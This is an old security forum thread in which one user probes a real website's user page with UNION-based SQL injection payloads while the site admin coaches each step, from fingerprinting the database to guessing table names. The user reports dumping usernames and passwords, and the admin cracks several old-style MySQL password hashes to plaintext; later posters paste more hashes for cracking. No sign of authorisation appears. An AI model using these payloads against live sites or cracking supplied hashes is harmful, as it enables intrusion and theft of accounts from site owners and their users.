|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
SQL Inj help |
|
Posted: Wed Feb 20, 2008 4:49 am |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
So I have a user info page and there's three errors in 3 different fields with
Code: | admin_view_user.php?userid=-1+OR |
Code: |
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/webpage/****/admin_view_user.php on line 212 |
any userid gives this error.
Code: | -1+UNION+ALL+SELECT+@@version--+ |
gives 4.1.11 in userID field
Code: | -1+UNION+ALL+SELECT+@@version,@@version--+ |
gives only sql warning error
Code: |
-1+UNION+ALL+SELECT+@@version,@@version,@@version--+ |
gives only sql warning error
Code: | -1+UNION+ALL+SELECT+@@version,@@version,@@version,@@version--+ |
gives 4.1.11 in place where 3rd warning was.
Code: |
-1+UNION+ALL+SELECT+1,2,3,4 |
gives blah blah 2 blah blah 3 in place where 3rd warning was.
Code: |
-1+UNION+ALL+SELECT+1,4,5,4--+ |
gives blah blah 4 blah blah 5 in place where 3rd warning was.
Code: | -1+UNION+ALL+SELECT+1,2,3,4,5--+ |
back to mysql warning error. This continues no matter how many numbers.
Some help in progressing? |
|
|
|
|
|
|
|
|
Posted: Wed Feb 20, 2008 10:22 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
So "-1+UNION+ALL+SELECT+@@version--+" is working for you, because you got feedback - MySql version.
Next just use this for fetching other data:
Code: |
-1+UNION+ALL+SELECT+USER()--+
|
Code: |
-1+UNION+ALL+SELECT+DATABASE()--+
|
Code: |
-1+UNION+ALL+SELECT+COUNT(*)+FROM+mysql.user--+
|
About error messages - do they reveal sql schema details, like table and field names? |
|
|
|
|
Posted: Wed Feb 20, 2008 1:13 pm |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
Output from:
-1+UNION+ALL+SELECT+USER()--+
sitename@localhost
-1+UNION+ALL+SELECT+DATABASE()--+
sitename
-1+UNION+ALL+SELECT+COUNT(*)+FROM+mysql.user--+
blank
No error messages are showing schema details. |
|
|
|
|
Posted: Wed Feb 20, 2008 1:39 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
As version is 4.1.x and there is no INFORMATION_SCHEMA, then you have to guess table and field names ...
Code: |
-1+UNION+ALL+SELECT+COUNT(*)+FROM+user--+
|
Code: |
-1+UNION+ALL+SELECT+COUNT(*)+FROM+users--+
|
Code: |
-1+UNION+ALL+SELECT+COUNT(*)+FROM+admin--+
|
Code: |
-1+UNION+ALL+SELECT+COUNT(*)+FROM+admins--+
|
Code: |
-1+UNION+ALL+SELECT+COUNT(*)+FROM+login--+
|
if you get existing table name, then rows count can be seen. |
|
|
|
|
Posted: Wed Feb 20, 2008 11:03 pm |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
Thanks waraxe i got username and passwords
But passwords are in weird form i have never seen, maybe you have?
I thought it was just hex but hex decoder doesnt work!
So I made user account to help you.
2894bf0d22b7db6e = conibear
4b5698aa4603595b |
|
|
|
|
Posted: Thu Feb 21, 2008 12:13 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
gibbocool wrote: | Thanks waraxe i got username and passwords
But passwords are in weird form i have never seen, maybe you have?
I thought it was just hex but hex decoder doesnt work!
So I made user account to help you.
2894bf0d22b7db6e = conibear
4b5698aa4603595b |
It's old-style mysql hash algorithm.
Plaintext of 4B5698AA4603595B is abc123
|
|
|
|
|
Posted: Thu Feb 21, 2008 12:17 am |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
So how did you decode it?
Also
244bb9953224055c |
|
|
|
|
Posted: Thu Feb 21, 2008 12:26 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
gibbocool wrote: | So how did you decode it?
Also
244bb9953224055c |
Plaintext of 244BB9953224055C is ponting
I am using Cain password cracker --> MySql hashes --> Mysql 3.23 Hashes
And this is not decoding, it's cracking. There is difference between them |
|
|
|
|
Posted: Thu Feb 21, 2008 12:34 am |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
Thanks waraxe
I assume you used rainbow tables? |
|
|
|
|
Posted: Thu Feb 21, 2008 12:48 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
gibbocool wrote: | Thanks waraxe
I assume you used rainbow tables? |
No, currently i don't have mysql hash rainbow tables, only for md5.
But hashes for such easy passwords can be successfully cracked by bruteforce and wordlist methods. And I was using wordlists |
|
|
|
|
Posted: Sat Mar 01, 2008 11:49 pm |
|
|
cavevip |
Regular user |
|
|
Joined: Mar 01, 2008 |
Posts: 10 |
|
|
|
|
|
|
|
7de3c2b43b1239ea
0ae737342ae98ce6
042f00283cae02b2
7389bec86c828d5a
help me crack pass mysql
thanks |
|
|
|
|
Posted: Sun Mar 02, 2008 12:08 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
cavevip wrote: | 7de3c2b43b1239ea
0ae737342ae98ce6
042f00283cae02b2
7389bec86c828d5a
help me crack pass mysql
thanks |
Plaintext of 042F00283CAE02B2 is andyn
Plaintext of 0AE737342AE98CE6 is pulteney
Plaintext of 7389BEC86C828D5A is qb35jr7 |
|
|
|
|
|
crack |
|
Posted: Mon Sep 16, 2013 11:30 am |
|
|
centro |
Beginner |
|
|
Joined: Sep 16, 2013 |
Posts: 2 |
|
|
|
|
|
|
|
can someone crack this? 64ca7cc70da9d482
thank you friends |
|
|
|
|
Posted: Fri Feb 28, 2014 8:59 am |
|
|
goodboya |
Beginner |
|
|
Joined: Feb 27, 2014 |
Posts: 3 |
|
|
|
|
|
|
|
2894bf0d22b7db6e = conibear
_____________________
Fut 14 Coins |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|